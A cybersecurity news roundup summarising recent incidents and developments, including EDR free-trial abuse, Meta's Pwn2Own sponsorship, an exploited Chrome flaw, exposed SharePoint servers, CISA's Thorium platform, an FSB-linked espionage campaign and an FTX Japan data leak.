Hackers Exploit EDR Free Trials to Bypass Endpoint Security
Cybersecurity researchers have recently identified a sophisticated attack vector in which threat actors are abusing free trial versions of endpoint detection and response (EDR) software. This approach enables attackers to circumvent organizational defenses and deploy malware payloads undetected, raising significant concerns about endpoint resilience, licensing controls, and attack surface management.
The Attack Path: Leveraging the Freemium Model
Modern EDR vendors frequently offer free trials of their security software to stimulate enterprise adoption. Threat actors have discovered that, during the trial period, some security controls and telemetric logging capabilities are throttled or absent. Attackers use email phishing or direct downloads to trick legitimate system users or administrators into installing free trial EDR agents on production endpoints. In a lab environment, researchers demonstrated that certain trial agents failed to upload all telemetry data to the vendor’s cloud, delayed deliverable threat intelligence, or did not enforce all detection rules.
Impacts and Risks
Once the weakened EDR agent is deployed, malware samples tailored to the expected detection profile can be executed on the endpoint—often bypassing the signature and behavior-based heuristics active in regular licensed versions. Subsequent lateral movement, data exfiltration, or even ransomware initiation can occur with reduced probability of alerting defenders. Incident responders noted a marked delay in forensic artifact generation and real-time monitoring, complicating attack detection and evidence gathering.
Recommendations and Next Steps
Security teams are urged to strictly regulate software installations, verify EDR agents’ license status across all endpoints, and block the execution of trial binaries in enterprise environments. EDR vendors are advised to ensure parity in core detection and reporting features between trial and paid licenses and to implement transparent labeling or alerting when trial agents are installed on critical infrastructure.
Meta Ups Security Stakes with Major Pwn2Own Sponsorship Focusing on WhatsApp and Wearables
Meta has significantly increased its involvement in independent vulnerability research by sponsoring the upcoming Pwn2Own hacking competition, earmarking record-setting bounties for smartphone, WhatsApp, and wearable device exploits. This marks a strategic push to harden critical communication and consumer health platforms against real-world threats through coordinated disclosure.
Pwn2Own Ireland 2025 Incentive Structure
Meta’s sponsorship includes a $1 million reward for a demonstrated zero-click remote code execution (RCE) exploit against WhatsApp—the highest payout in the history of the event. Exploits targeting wearables and smartphones are also eligible for substantial bounties. Eligible targets include iOS and Android smartphones, Meta Quest devices, and wearOS smartwatches. Researchers must deliver a full technical writeup under the Zero Day Initiative’s responsible disclosure policy.
Technical Relevance and Industry Impact
The focus on WhatsApp zero-click exploits highlights ongoing attacker interest in messaging apps that serve as foundational communications infrastructure for billions. Zero-click exploits are especially valuable because they require no user interaction—making them covertly deployable in APT campaigns. The inclusion of wearable devices reflects growing concern over personal health and biometric data exposure.
Meta’s Security Posture Evolution
By sponsoring targeted hacking contests, Meta aims to foster greater collaboration with the security research community and accelerate the remediation of unknown vulnerabilities before hostile actors can weaponize them. The outcome of Pwn2Own will likely set new benchmarks for vulnerability reward programs industry-wide.
Google Project Zero Adapts Vulnerability Disclosure, Chrome Flaw (CVE-2025-6558) Exploited
Google’s Project Zero has made a procedural change to its bug disclosure policy, now publicly sharing the discovery date and 90-day disclosure deadline for all reported flaws. Simultaneously, Google TAG flagged a critical Chrome vulnerability (CVE-2025-6558) in ANGLE and GPU components as exploited in the wild, marking heightened urgency in browser security.
Chrome ANGLE and GPU Vulnerability Analysis
The vulnerability in question permits remote attackers to execute arbitrary code via a crafted web page, abusing flaws in Chrome’s graphics abstraction layer (ANGLE) and GPU subprocesses. Exploit attempts detected by Google TAG suggest targeted campaigns against at-risk users, though exact kill chains remain undisclosed.
Project Zero’s Policy Update
Project Zero’s move towards greater disclosure transparency aims to increase vendor accountability and encourage faster patch adoption. By tracking the 90-day window from public acknowledgement, end-users and enterprises gain improved visibility into the status of critical security updates.
Broader Implications
This change is expected to pressure vendors to accelerate patch development, while providing downstream vendors and incident responders with key context on evolving exploit timelines. The rapid confirmation of in-the-wild exploitation for CVE-2025-6558 reinforces the persistent threat from browser-focused attack vectors.
The Water Sector Faces Escalating Cybersecurity Risk
Security researchers and critical infrastructure authorities have sounded the alarm for heightened and continuing cyber risks in the water sector. A combination of aging operational technology, growing OT/IT convergence, and inadequately patched systems has resulted in water utilities becoming a prime target for both ransomware operators and nation-state-aligned groups.
Threat Landscape and Attack Techniques
Recent analysis suggests water sector networks are being actively probed for common vulnerabilities in SCADA systems, remote access tools, and unsegmented corporate networks. Attackers are increasingly deploying malware that targets programmable logic controllers (PLCs), capable of manipulating water treatment processes, chemical dosing, and supply valves.
Vulnerabilities and Response
Incident response teams have documented cases where attackers used “living off the land” tools—native operating system commands and legitimate utilities—to escalate privileges, conduct reconnaissance, and achieve persistence. Weak segmentation between IT and OT environments has allowed attackers to move laterally, potentially threatening safe drinking water delivery.
Sector Recommendations
CISA and sector-specific experts recommend segmentation of IT and OT networks, rapid patching of exposure points, and enhanced monitoring for anomalous operations. The water sector is encouraged to engage in robust tabletop exercises to test both cyber and physical incident response protocols.
17,000+ SharePoint Servers Exposed; 840 Vulnerable to 0-Day
A widespread crisis has emerged as more than 17,000 Microsoft SharePoint servers have been discovered exposed to the public internet, including 840 systems vulnerable to active zero-day attacks, according to recent vulnerability research. Threat actors are actively scanning and exploiting these servers, raising alarms about supply chain and data integrity risks across government, critical infrastructure, and enterprise targets.
Identification and Risk Analysis
Internet-wide scans show a significant percentage of online SharePoint servers running unpatched software versions, lacking basic security hardening, and exposing outdated collaboration platforms to external threats. Of the 17,000 identified servers, at least 840 are confirmed as susceptible to an actively exploited, unnamed zero-day vulnerability.
Exploitation and Threat Activities
Attackers are leveraging the vulnerability to gain initial access to sensitive corporate resources, exfiltrate data, install backdoors, and launch secondary attacks across interconnected environments. The ease of exploitation raises concerns about potential for ransomware, business email compromise, and information theft campaigns targeting organizations of all sizes.
Mitigation and Defensive Measures
Microsoft and security vendors advise immediate patching, disabling legacy features where possible, and deploying network segmentation to limit blast radius in the event of compromise. Organizations are also urged to implement vulnerability scanning and adopt threat intelligence feeds to identify new exploit attempts in real-time.
CISA Releases Thorium: A Powerful Open-Source Malware & Forensics Platform
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released Thorium, an advanced open-source platform designed to accelerate malware analysis, digital forensics, and incident response for enterprise defenders and researchers alike. This toolset aims to democratize access to state-of-the-art forensics and empower organizations to respond more effectively to modern threats.
Thorium Platform Overview
Thorium integrates automated malware unpacking, deep binary analysis, behavior-based anomaly detection, and reporting tools into a unified, modular system. Its architecture is built for extensibility, supporting user-developed plugins for specific file formats, obfuscation techniques, and threat actor tradecraft.
Technical Capabilities
The platform supports rapid extraction and classification of malware indicators, cross-references threat intelligence sources, and enables “live” memory captures for suspected compromised hosts. Its UI is optimized for use by both seasoned forensics investigators and IT generalists responding to new incidents.
Adoption and Community Impact
By making Thorium open-source, CISA intends to boost collaboration across public and private sectors, speed up new threat research, and reduce barriers for organizations with limited budgets or regional access to commercial forensic suites. The project’s roadmap includes future integrations with SIEM and threat intelligence sharing platforms.
FSB-Linked Hackers Target Moscow Diplomats Using ISP-Level Access
Cybersecurity researchers have uncovered a Russian state-aligned cyber-espionage campaign targeting diplomats in Moscow using advanced techniques that leverage Internet Service Provider (ISP) level access. Attribution points to groups linked with the Russian Federal Security Service (FSB), employing methods designed to bypass perimeter defenses and achieve persistent access to sensitive diplomatic communications.
Attack Vector Analysis
The attackers utilized privileged ISP access to inject tailored malicious payloads during the transit of network traffic, sidestepping endpoint protections and encrypted channels. Malicious implants were delivered to selected high-value targets via “man in the middle” (MitM) attacks on locally routed traffic.
Persistence and Counter-Detection Measures
These implants offered command and control (C2) functionality with counter-forensics and self-deletion routines. By launching attacks within Russia’s borders and leveraging local service providers, attackers substantially reduced detection by external monitoring systems.
Targets and Implications
Initial reporting highlights diplomatic missions and expatriate organizations operating in Moscow as principal targets. The campaign underscores the risk posed by advanced actors with state access, particularly in adversarial nations where telecom infrastructure can be co-opted for surveillance and espionage.
FTX Japan Data Leaks Affect Over 35,000 Former Users After Platform Closure
Despite the platform’s shutdown over a year ago, FTX Japan was recently found to be leaking personal and financial data on more than 35,000 users. The data includes sensitive identity and account details that remain exposed online, presenting heightened fraud and targeted attack risks for affected individuals.
Exposure Timeline and Discovery
The long-term online existence of backup and archival infrastructure tied to FTX Japan enabled the persistent accessibility of decommissioned user data. Security researchers only recently flagged these databases as open to unauthorized access, triggering swift efforts to secure the remaining assets.
Types of Data and Threat Implications
The exposed data set reportedly contains KYC documents (know-your-customer), internal communications, account balances, and transaction histories, serving as a valuable resource for identity thieves, cryptocurrency scammers, and phishing campaigns. The perennial accessibility of post-mortem data underlines systemic weaknesses in asset decommissioning in the rapidly evolving crypto sector.
Call for Stronger Controls
Experts urge all digital asset platforms to adopt strict retention, encryption, and offboarding protocols for sensitive user data and to routinely audit exposed infrastructure beyond the platform’s active life to prevent repeat incidents of this kind.